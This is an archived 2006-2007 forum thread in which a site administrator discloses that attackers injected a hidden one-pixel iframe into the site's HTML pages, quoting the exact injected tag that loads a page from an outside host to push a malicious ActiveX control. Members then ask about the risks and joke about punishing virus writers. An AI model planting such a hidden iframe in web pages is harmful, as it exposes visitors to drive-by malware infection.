PDA

View Full Version : Important Security Issue - Hacking Attack



Edward
December 8th, 2006, 12:42 PM
I have discovered this morning that there was a hacking attack on Wired New York.

It seems that the attack occurred on 11/22/06 at 8:36 am.

As a result, the following code was added to all html pages (but not forum pages):
<iframe src="http://constellations.ws/counter.php" width=1 height=1 frameborder=0 scrolling=NO></iframe>
Apparently the code tries to load an ActiveX control in Internet Explorer. Users of Firefox are not affected by this issue.

Firefox does not run ActiveX controls, Internet Explorer version 7 requests your permission to run the ActiveX control, and IE6 - I am not sure, probably depends on your security settings. If you allow the ActiveX control to run, your computer might be infected by a virus (that is if do not have anti-virus software installed).

I am currently in touch with the server host and vBulletin support, trying to understand how the attack happened and what is the appropriate response.

As of this moment, Wired New York pages still contain the malicious code. The forum pages are not affected. If you view Wired New York pages, either use Firefox, or if you are using IE make sure your security settings do not allow the ActiveX control to run automatically.

I will issue updates about any new developments in this situation.

lofter1
December 8th, 2006, 12:52 PM
I had noticed this ^^^ at the top of the page when clicking into the forum ...

Never activated it ... hope it will be gone before too long.

Ninjahedge
December 8th, 2006, 01:49 PM
Had me worried for a bit, but I am a forum-er not a page-er...


Hope you are able to trace this and how it got on the site!!!!

BrooklynRider
December 8th, 2006, 03:46 PM
Can some explain what the threat is and what impact it has on our computers?

Also, can someone more educated than I in IE tell me what the custom IE Security setting should be for Active X if this is a threat?

Edward
December 8th, 2006, 04:24 PM
I think with default settings for IE it will prompt you to install the ActiveX control when you visit a Wired New York page. If you decline (as you should in all cases when you do not know the purpose) then you will be fine. If you agree, the control will try to infect your computer with some sort of virus (which might be prevented by your anti-virus program).

lofter1
December 8th, 2006, 06:52 PM
Another question on this topic from a dense non-techie ...

Other sites sometimes show that same "Click here to activate the ActiveX Control" bar message.

Is that a sign of a hack? And is it always wise NOT to click that?

Edward
December 8th, 2006, 07:18 PM
It is not necessarily a sign of a hack, there are legitimate applications, however, it is always wise not to click if you do not know the purpose. If a site explains to you why this is needed and you indeed need it and you trust the site, then you can install it.

macreator
December 9th, 2006, 08:12 PM
Thanks for the notice, Edward. I'll be sure to make sure IE on my PC doesn't automatically run ActiveX. Luckily I mainly use my Mac to access the site.

Fabrizio
December 10th, 2006, 09:36 AM
So I imagine this has no affect at all on Mac computers. True?

bmc
December 10th, 2006, 01:01 PM
So I imagine this has no affect at all on Mac computers. True?

That's correct, Fabrizio. This has no effect on Macintosh systems at all. :)

Edward
December 12th, 2006, 09:37 PM
I cleaned the site the same day, 8 Dec 06, but it's still worth reminding not to allow installation of ActiveX when you are not sure of the purpose, and also please report to me any unusual behaviour.

antinimby
December 13th, 2006, 01:24 AM
Damn hackers.

lofter1
December 13th, 2006, 11:49 AM
Since you "cleaned" it I've run into no problems -- but was experiencing some aggravating freezes / slow loading between 11/22 <> 12/8 (so I probably stupidly clicked something I shouldn't have during that time and gummed myself up).

kz1000ps
December 13th, 2006, 12:09 PM
I hate to whine about something relatively trivial like this, but has anyone else noticed the site has been slow in recent days? Alexa shows that traffic has been about as slow as it's gotten this year, so it can't be that.

american dream
December 20th, 2006, 10:32 AM
thanx for noticing us, i,ll take care ..

Bob
December 30th, 2006, 08:13 AM
These people who create and post internet viruses need to be shot. Publicly.

ZippyTheChimp
December 30th, 2006, 03:47 PM
A little too severe.

Since many, when caught, express surprise that they are treated as criminals, and to satisfy my own urge to just slap them around while telling them what idiots they are - I propose:

Stocks (http://en.wikipedia.org/wiki/Stocks) and Pillories (http://en.wikipedia.org/wiki/Pillory)

lofter1
December 30th, 2006, 07:40 PM
Agreed ^^^

Fear of public humiliation while still alive would most likely be a far greater deterrent than any threat of death, which for many is just too abstract.

ablarc
December 31st, 2006, 01:53 PM
I propose:

Stocks (http://en.wikipedia.org/wiki/Stocks) and Pillories (http://en.wikipedia.org/wiki/Pillory)
I agree, and would add: flogging (at the option of the convicted party). Many would choose it over years or even months stewing in jail. If it's chosen, it's not inhumane.

ZippyTheChimp
December 31st, 2006, 04:01 PM
We'd have to choose a good public square. (http://www.wirednewyork.com/forum/showthread.php?t=10703&page=3&highlight=square)

lofter1
December 31st, 2006, 04:17 PM
Perhaps we should choose Coentes Slip, where in October 1691 (http://home.eznet.net/~dminor/NYNY1690.html) :

Surveyors begin laying out streets and lots. The council votes a four shilling per week allowance to Top-Knot Betty, another woman and two children, as charity cases. It also votes for the construction of a ducking stool (http://www.getchwood.com/punishments/curious/chapter-2.html) to be built on Coentes Slip, in front of the towne-house.

http://content.answers.com/main/content/wp/en/thumb/4/46/300px-Cucking_stool.png

ablarc
December 31st, 2006, 05:59 PM
We'd have to choose a good public square. (http://www.wirednewyork.com/forum/showthread.php?t=10703&page=3&highlight=square)
Floggings in Bryant Park?



Right after the fashion shows.

Ninjahedge
January 22nd, 2007, 11:47 AM
DURING the fashion shows...

They need to drum up some more attention to this little-known and under utilized profession!

ZippyTheChimp
January 22nd, 2007, 12:52 PM
Floggings in Bryant Park?

Right after the fashion shows.



DURING the fashion shows...

It could be worked out.
http://dts.ystoretools.com/1150/images/250x1000/doco.jpg

kz1000ps
January 22nd, 2007, 02:07 PM
But if she's the flogger, then imagine how many pent-up nerds are going to start writing viruses just to get a little action. It'd be pAnDEmoNiuM!

ZippyTheChimp
January 22nd, 2007, 03:42 PM
Setting up a code of law isn't as easy as I thought.

Ninjahedge
January 22nd, 2007, 03:57 PM
Setting up a code of law isn't as easy as I thought.

Coda what?

http://ledzeppelin.alexreisner.com/graphics/covers/coda.jpg

ablarc
January 24th, 2007, 09:27 PM
^ LOL! To think, I almost missed this!

ZippyTheChimp
January 24th, 2007, 10:46 PM
We've completely trashed Edward's thread.

OmegaNYC
January 27th, 2007, 02:13 PM
^ He won't be mad at us? Would he? :(